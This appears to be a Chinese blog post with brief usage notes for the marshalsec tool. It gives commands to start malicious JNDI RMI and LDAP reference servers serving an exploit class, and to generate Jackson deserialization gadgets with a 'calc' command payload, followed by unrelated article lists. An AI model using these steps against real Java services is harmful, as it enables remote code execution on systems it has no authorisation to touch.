开启rmi服务，恶意类放到服务上

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/css/#ExportObject 1099

开启ldap服务

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/css/#ExportObject 1389

参考链接

列出所有jackson的gadgets传参为calc

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a exploit.exec="calc"

所有支持的组件



所有支持的gadgets





如果想查找组件可以生成的gadgets有哪些

以Jackson为例

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson

如果想查找gadgets可以用于哪些组件生成

1、以resin为例，可以查看手册



2、选择想看的gadgets->find usages



参考链接

最新文章

1. Bootstrap<基础九>辅助类
2. JQuery实现对勾事件代码
3. 【leetcode】Implement strStr() (easy)
4. 使用NSData处理数据
5. 理解python先编译后解释的特点
6. javascript之六种数据类型以及特殊注意点
7. PHP.4-DIV+CSS标准网页布局准备工作（下）
8. [BigData]关于Hadoop学习笔记第一天(PPT总结)(一)
9. Hybrid App开发者一定不要错过的框架和工具
10. rabbitmq pika connection closed
11. USB通讯协议之深入理解
12. ClassLoader的类结构分析
13. HashTable源码阅读
14. python 多线程 及多线程通信，互斥锁,线程池
15. MVC中的下载文件及上传
16. Python 音视频方面资源大全
17. lsb_release command not found
18. css3动态计算元素的高度及宽度
19. LINUX 修改SSH默认22端口的方法
20. wordpress获取文章所属分类

热门文章

1. 32Flutter仿京东商城项目 用户中心页面布局
2. Python基于正则表达式实现文件内容替换的方法
3. 原创：Mac AppleScript 自动登录两个QQ
4. Django中使用Bootstrap----带view.py视图函数（也就是项目下的脚本文件）
5. Java解压tar.Z文件（使用Apache Commons-compress）
6. python之bytes和string相互转换
7. golang web框架 beego 学习 （七）json转数组
8. Qt598x64vs2017.跨线程传递std::string
9. Jenkins简单入门：下载-安装-配置-构建
10. Python进入后台界面（admin）设定